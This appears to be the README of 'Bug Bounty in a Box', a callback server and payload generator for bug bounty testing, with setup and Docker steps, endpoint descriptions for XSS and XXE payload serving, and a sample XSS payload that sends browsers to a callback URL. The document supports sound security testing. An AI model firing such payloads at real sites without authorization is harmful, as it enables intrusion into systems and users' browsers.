This repository contains all* that you should need to get up and running to test for bugs against your targets.
* Ok, literally not everything but it's a good start!
This is by no means "production ready"; there are still some server configuration options that need to be explored before this should be run in production.
To-do list- Add more payloads!
- Add more endpoints!
- Add "Development" guide
To get up & hacking, you'll need to:
- Move the configuration sample:
mv config/application.yml.sample config/application.yml - Edit the
config/application.ymlto your preferences - Install the gems:
bundle install - Start the server:
ruby app.rb - Move the payload sample:
mv payloads/xss.yml.sample payloads/xss.yml - Generate the payloads:
ruby generate_payloads.rb --callback=YOUR_SERVER_URL --target=YOUR_TARGET - Use
payloads/xss.txtin Burp's Intruder (or something similar) - Cross your fingers...
- Profit!
Note: You cannot currently generate payloads with the Docker container. The Docker container only runs the server.
To get up & running in Docker, clone this repository and run the following:
mv config/application.yml.sample config/application.yml
vim config/application.yml # Edit your config values!
mkdir -p logs
docker build -t bbb . && docker run -d \
-v $(pwd)/config/application.yml:/app/config/application.yml \
-v $(pwd)/logs/:/app/logs/ \
-p 4567:4567 \
-e "APP_ENV=production" \
bbbThen, you should be able to curl localhost:4567 and see the hello world!
If you'd like to know how to set up the Bug Bounty in a Box callback server for "production" use, check out the Wiki.
This "bug bounty in a box" has two different components:
- A payload callback server
- A payload generator
The callback server, written in Ruby & using Sinatra, currently has the following capabilities:
- Callback: A callback with a payload & target parameter will log the "callback" to a on-server text log as well as send a Slack message to a Slack webhook. (
/callback) - Payloads: A payload file of your choice that will contain your callback URL. (
/payload)- Currently supports:
- JavaScript (
js) for XSS - SVG (
svg) for XSS - XML (
xml) for XXE - XML (
svg) for XXE
- JavaScript (
- Currently supports:
- Redirect: Redirects to a specified URL in the redirect GET parameter. (
/redirect) - Unauthorized: Throws a 401 for non-OPTIONS & non-HEAD requests. Also accepts a content_type parameter to return a specific content type. (
/unauthorized)
You can configure the server in config/application.yml! See below for the different configuration options.
In order to receive Slack callbacks, you'll need to set the appropriate slack_url. To generate an incoming webhook for your Slack instance, check out Slack's Help Center.
If you'd like to change either the frequency of the log rotation or the log filenames, check out the configuration file.
The payload generator uses .yml files to generate a .txt files that contain a list of payloads that can be used in a tool like Burp Intruder.
Before running the payload generator, make sure you have some properly formatted .yml files in the payloads folder! After you've done that, you'll need to run the payload generator with the --callback and --target flags like such:
ruby generate_payloads.rb --callback=localhost:4567/callback --target=www.example.comThen, check out the payloads folder for the .txt file with a list of payloads!
In order to add a new class of payloads, just create a new .yml file with the following:
name: XSS
payloads:
- description: A simple XSS payload
payload: <script>document.location='CALLBACK_URL'</script>
- payload: <script>document.location="CALLBACK_URL"</script>The CALLBACK_URL will be replaced with whatever is passed in with the --callback flag with some added parameters of (1) a callback description & (2) the target.
Want to contribute? Great! Here's what you do:
- Fork this repository
- Push some code to your fork
- Come back to this repository and open a PR
- After some review, get that PR merged to master
- 🎉 Thank you for your contribution!!
Feel free to also open an issue with any bugs/comments/requests!